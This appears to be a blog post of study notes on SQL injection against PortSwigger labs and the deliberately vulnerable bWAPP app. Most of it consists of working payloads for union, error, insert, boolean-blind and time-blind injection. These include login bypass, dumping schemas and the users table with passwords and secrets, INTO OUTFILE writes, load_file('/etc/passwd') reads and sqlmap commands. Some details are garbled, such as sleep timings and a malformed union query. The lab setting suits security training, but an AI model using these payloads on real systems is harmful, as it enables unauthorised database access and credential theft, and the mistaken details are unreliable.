SQL Injection

on
    
  1. SQL injection:
    1. SQL injection arises when a user sends untrusted sql code to the database server by injecting in the application.
    1. Three classes on the basis of data - extraction: -
      1. Inband: -
      2. Inferential or Blind
      3. Out of a band
    2. Five Techniques to exploit SQL injection: -
      1. Union Operator (U) - 
      2. Boolean Technique (B)
      3. Error-Based Technique (E)
      4. Out of Band Technique (O)
      5. Time Delay Technique (T)
    3. Exploits: -
      1. SQL Injection (Post/Search)
        1. Break the query with a single quote (‘).
        2. Then we can use #   --  // sign to comment query present after single quote.
        3. We can also use the “order by” command to check the columns present in the table.
          1. ‘ order by 1 till ‘order by ( number of tables) [Do this until we do receive an error ]
          2. From ‘ order by 1 to ‘ order by 10 gives no error and ‘ order by 11 gives an error that means there are only 10 columns.  
          3. If we give ‘ order by 10   this means order by results with 10 columns. 
    4. Portswigger examples of sql injections: -
      1. First example : -
        1. Read the exercise in below mentioned screenshot
        2. Here the gift category has a sql injection which has been exploited as mentioned below.
        3. Category = Gifts ( category is a parameter and gift is a value)
        4. To exploit :-
          1. Gifts’ OR 1 = 1 --
          2. This will print all category results available in the application/database.


      1. Second Example: -
        1. Read the exercise in below mentioned screenshot
        2. In this example we have a login page with username administrator.
        3. We need to bypass the login page by giving 
          1. administrator’ OR 1 = 1 --



      1. Third/ explore portswigger.
    1. Bwapp application.
      1. Inband SQL Injection over a Search Form (SQL Injection - POST Search)
        1. Scenario is : - You can search movie names, If it is present in the database it gives you movie names otherwise not.
        2. SQL Injection (Post/Search)
          1. Break the query with a single quote (‘).
          2. Then we can use #   --  // sign to comment query present after single quote.
          3. We can also use the “order by” command to check the columns present in the table.
            1. ‘ order by 1 till ‘order by ( number of tables) [Do this until we do receive an error ]
            2. From ‘ order by 1 to ‘ order by 10 gives no error and ‘ order by 11 gives an error that means there are only 10 columns.  
            3. If we give ‘ order by 10   this means order by results with 10 columns. 
            4. Now if you give ( ' union select 1, , 3, 4, 5, 6, 7# ), it will give you the number of columns all columns.
            5. Then instead of 2, 3, 4 we will add version(), database(), user() eg:-   ' union select  1, version(), database(), user(), 5, 6, 7#
      2. Inband SQL Injection over a Search Form (SQL Injection - Select From)
        1. Scenario: - You can select movies from the drop down menu and then click the “GO” button which brings movie details from the server.
        2. SQL Injection (Post/Select Form)
          1. If we check “first step” in proxy (by intercepting request) then we see it is a post request and in body there are parameters like: 
          2. movie=1&action=go
          1. Now if we try with quotes (‘) to break the query posted towards the database like the previous scenario then it is throwing error but not satisfying the syntax if we use other single quotes like in the previous scenario.
          2. But catch is, if we give sql statement without quotes then it works like: -
            1.  G.I Joe: Retaliation is a movie present on the first record of the table. 
              1. movie=1 &action=go
            2. So if we enter: - 
              1. movie=1 or 1=1&action=go
              2. Above statement just satisfies the syntax and brings “ G.I Joe: Retaliation” from the server.
              3. If we do : -
                1. movie=3 or 1=1&action=go
                2. Above statement also brings the first record “G.I Joe: Retaliation” only, not the third record movie.
                3. Which shows we can retrieve the information from the database.
            3. Now try to find number of columns available: -
              1. Total 7 columns are available like: -
                1. movie=1 order by 7&action=go
                2. Where 1 = movie record 
                3. order by 7 = correct number of columns, by order by 8 it gives an error.
            4. Now we will try to print all columns: -
              1. movie=0 union select 1,2,3,4,5,6,7&action=go
              2. Where 0 = no records, we can use null also on 0 place.
              1. We have column 2, 3, 5, 4 to retrieve the information.
            1. Lets retrieve version, database, user: -
              1. movie=0 union select 1,version(),database(),user(),5,6,7#&action=go
              2. Where 0 = null record.
              3. # = after # no statement will be executed.

            1. Lets retrieve the character set of the database.
              1. movie=0 union select 1,schema_name,default_character_set_name,default_collation_name,5,6,7 from information_schema.schemata limit 0,1#&action=go

            1. Retrieve the database: -
              1. movie=0 union select 1,schema_name,default_character_set_name,default_collation_name,5,6,7 from information_schema.schemata limit 1,1#&action=go
              1. movie=0 union select 1,schema_name,default_character_set_name,default_collation_name,5,6,7 from information_schema.schemata limit 2,1#&action=go
              1. movie=0 union select 1,schema_name,default_character_set_name,default_collation_name,5,6,7 from information_schema.schemata limit 3,1#&action=go
              1. Club all databases: - movie=0 union select 1,group_concat(schema_name), group_concat(default_character_set_name),group_concat(default_collation_name),5,6,7 from information_schema.schemata&action=go
            1. Retrieve tables: -
              1. movie=0 union select 1, table_name,3,4,5,6,7 from information_schema.tables&action=go
              1.  movie=0 union select 1, table_name,3,4,5,6,7 from information_schema.tables limit 1,1&action=go
              1. Club all table names:- movie=0 union select 1, group_concat(table_name),3,4,5,6,7 from information_schema.tables&action=go
            1. Retrieve table name in particular database( bWAPP): -
              1. movie=0 union select 1, group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema='bWAPP'&action=go
            1. Retrieve column name in particular table ( database = bWAPP, table = movies)
              1. movie=0 union select 1, group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_schema='bWAPP' and table_name='movies' &action=go
            1. Now we are well aware about the database structure and its database names, tables and columns.Find the values or data present in the tables: -
              1. We know the table name, database name: -
                1. movie=0 union select * from bWAPP.movies&action=go
                2. Above step will give the first record in the table.
                1. movie=0 union select * from bWAPP.movies limit 5,1 &action=go
                2. Above step will give another record (5th) because limit 5, 1 is added.
                1. movie=0 union select group_concat(id),group_concat(title),group_concat(release_year),group_concat(genre),group_concat(main_character),group_concat(imdb),group_concat(tickets_stock) from bWAPP.movies &action=go
                2. Above step provided values present in the whole table.
                3. This query includes all the columns available in the table.
                1. movie=0 union select * from movies into OUTFILE '/var/www/bWAPP/documents/results.txt' &action=go
                2. Above statement will write the output in a file and save it on the given location.
                3. Ignore the warning
                1. movie=0 union select 1, load_file('/var/www/bWAPP/documents/results.txt'),3,4,5,6,7 &action=go
                2. Above statement will load the file and show the output.

      1. Error-Based SQL injection over a Login Form
        1. Scenario 1: - Bypass login form - SQL injection (login form / hero)
          1. Enter something into login - it will give “invalid credentials” or some other message.
          2. Put a single quote (‘) or double quotes, try 3-4 patterns - if an mssql error message comes it means we successfully broke the SQL query running behind login form.
          3.  ‘ or 1 = 1 #     this sql injection will let us login.
          4. Enumerate users: - ( when we give 7 in limit, it gives error, which means only 6 users are present)
            1. ' or 1 = 1  limit 1,1#
            2. ' or 1 = 1  limit 2,1#
            3. ' or 1 = 1  limit 3,1#
            4. ' or 1 = 1  limit 4,1#
            5. ' or 1 = 1  limit 5,1#
            6. ' or 1 = 1  limit 6,1#

          1. Column numbers: - ( when we enter 5 in column number, it gives an error, only 4 columns)
            1. ' or 1 = 1  order by 1#
            2. ' or 1 = 1  order by 2#
            3. ' or 1 = 1  order by 3#
            4. ' or 1 = 1  order by 4#

          1. Enumerate database name and username.
            1. ‘ union select 1,2,3,4#     it will give the columns where we can print values later.
            2. ‘ union select 1,database(),3,user(),4#

      1. SQL injection over insert statement
        1. Scenario : -SQL injection - stored Blog - like a comment page
        2. Insert query looks like : -
          1. INSERT INTO blog (date, entry, owner) VALUES (now(),’ ’, ’ ’)
        3. Put a single quote to disturb the syntax , but it will add the single quote into the database field.
        4. In step 2 (above),  in the VALUES(now(),’ ’, ‘ ‘) ------ if we add --- VALUES(now(),’a’, ‘b’)#
        5. a’, ‘b’)#   ---- this will not cause any problem instead will add a and b into the database.
        6.  a',(select 1))# - it will give the old value ( b inserted into database )
        7. ', (select concat_ws(0x3a,database(),version(),user())))#
        8. a',(select concat_ws(0x3a,schema_name,default_character_set_name,default_collation_name) from information_schema.schemata limit 0,1))#
        9. a',(select concat_ws(0x3a,schema_name,default_character_set_name,default_collation_name) from information_schema.schemata limit 1,1))#
        10. a',(select group_concat(schema_name) from information_schema.schemata))#
        1. Retrieve tables now:-
        2. a',(select concat_ws(0x3a,table_schema,table_name) from information_schema.tables limit 0,1))#
        3. a',(select concat_ws(0x3a,table_schema,table_name) from information_schema.tables limit 1,1))#
        4. a',(select concat_ws(0x3a,table_schema,table_name) from information_schema.tables limit 2,1))#
        5. a',(select concat_ws(0x3a,table_schema,table_name) from information_schema.tables limit 3,1))#
        6. a',(select group_concat(table_name) from information_schema.tables where table_schema='bWAPP'))# --- to find tables in ‘bWAPP’ database.
        7. a',(select concat_ws(0x3a,table_name,column_name) from information_schema.columns limit 0,1))#  --- to find table names
        8. a',(select group_concat(column_name) from information_schema.columns where table_schema='bWAPP' and table_name='users'))#  ---- to find out the column name under ‘bWAPP’ database and under ‘user’ table
        9. a',(select concat_ws(0x3A,id,login,password,email,secret,admin) from bWAPP.users limit 0,1))#



        1.  a',(select load_file('/etc/passwd')))#


      1. Boolean Based Blind SQL Injection
        1. Scenario -- SQL injection Blind Boolean based
        2. Normally the database holds movie names (for example), if a movie is present in DB then it gives a result otherwise negative message. 
        3. If try a single quote or something to disturb the syntax then some error comes.
        4. We will try blindly and logically now
        5. Write any SQL injection query like: --- ‘ or 1=1 --- it will break the query but sql error message does not appear.
        6. So we do not know how our syntax is breaking.
        7. We will follow two scenarios, FIRST - a positive statement and SECOND - a negative statement.
        8. Try ‘#
        9. May be above statement does not through an error, it may through a negative message ( that movie is not available in the database)
        10. Now we will try---   ‘  or 1=1#  ---this may be will load the positive message (movie is available in the database)
        1. Now we will try---   ‘  or 1=2#  ---this may be will load the negative message (movie is not available in the database)

        1. Try ---  ' or 1=1 and length(database())=5#
        2. In step 12, =5 is length of the current database
        1. ' or 1=1 and substring(database(),1,1)='a#
        2. Above step 14, explains --- what is a first letter present in the name of database , ( ‘a# ) in the query is a comparison if first letter is a or not.
        3. Likewise we need to bruteforce from a to z and find out the correct database.
        4. In this case we know the database name is ‘bWAPP’, so the queries will be like:-
        5. ' or 1=1 and substring(database(),1,1)='b’#
        6. ' or 1=1 and substring(database(),2,1)='W’#
        7. ' or 1=1 and substring(database(),3,1)='A’#
        8. ' or 1=1 and substring(database(),4,1)='P’#
        9. ' or 1=1 and substring(database(),5,1)='P’# 
        10. From step 18,19,20,21,22 the front end message will be

        1. Otherwise the frontend message will be
        1. There are multiple options available for comparison like: -
          1. ' or 1=1 and ascii(substring(database(),1,1))>97#
          2. 97 ascii value is a.

      1. Time Based Blind SQL Injection
        1. Scenario - SQL Injection Blind Time Based
        2. There is an input field, where we enter a movie name and if it is present then the result will be sent to your email address.
        3. ‘ and “ are not working.
        4. Because error reporting might be disabled in the code.
        5. Try boolean values, but boolean payloads do not work always.
        6. SO try: -    
          1. ' or 1=1 and sleep(0.2)#
          2. 0.2 is two seconds and application waits for 2 seconds.
          3. ' or 1=1 and benchmark(10000000,rand())#
          4. ' or 1=1 and if(mid(version(),1,1)='5',sleep(0.5),0)#     ---if os version 5 is in use then load the page after 5 seconds ( yes it is using ubuntu in backend)

      1. SQL MAP
        1. SQL Injection (Get/Search) -- Detecting and exploiting SQL injection with SQLmap
        2. Tool present in kali to use ---- sqlmap -h  and  sqlmap -hh give alot of tools
        3. Usage: -
          1. sqlmap -u “<<complete get url with values>>” -p title --cookies “<<require a value of cookie header present in the request of the same url ( add everything available in cookies header )>>” --random-agent -H “<<all request will be sent by this caption name here>>” --dbms MySQL --os Linux -f -b --current-db --is-dba
          2. Random agent -H (to add http header)- from where the request will be sent. 
          3. --dbms                       - MySQL
          4. --os                            - OS present
          5. -f                  - fingerprinting
          6. -b             - banner grab
          7. --current-db -- is-dba  - current db user is an admin or not/?
        4. Detecting and exploiting error based SQL Injection with SQLmap
          1. SQL Injection (Login Form/user)
          2. A login form with username and password fields
          3. Enter any input and intercept the request.
          4. Save the request (copy into a file .txt)
          5. Open terminal
            1. sqlmap -r <<path of the saved file(request)>> -p login -H <<who will send the request/special headers>>
            2. sqlmap -r <<path of the saved file(request)>> -p login -H <<who will send the request/special headers>> --technique E -f  -b
        5. Detecting and exploiting Boolean and Time based Blind SQL Injection with SQLmap
          1. SQL Injection -Blind -Boolean-Based
          2. A search box, which gives the movie name if it is present in the database.
          3. Enter any input and intercept the request.
          4. Save the request (copy into a file .txt)
          5. Open terminal
            1. sqlmap -r <<path of the saved file(request)>> -p title -H <<who will send the request/special headers>>
            2. sqlmap -r <<path of the saved file(request)>> -p title -H <<who will send the request/special headers>> --technique B --dbms MySQL --level 5 --risk 3
              1. Level 5 means much larger number of payloads
              2. risk  is try all possible types of sqli like OR
            3. TIme Based
            4. A search box, which gives the movie name if it is present in the database.
            5. Enter any input and intercept the request.
            6. Save the request (copy into a file .txt)
            7. Open terminal
              1. sqlmap -r <<path of the saved file(request)>> -p title -H <<who will send the request/special headers>>
              2. sqlmap -r <<path of the saved file(request)>> -p title -H <<who will send the request/special headers>> --technique T -b -f


Comments

Post a Comment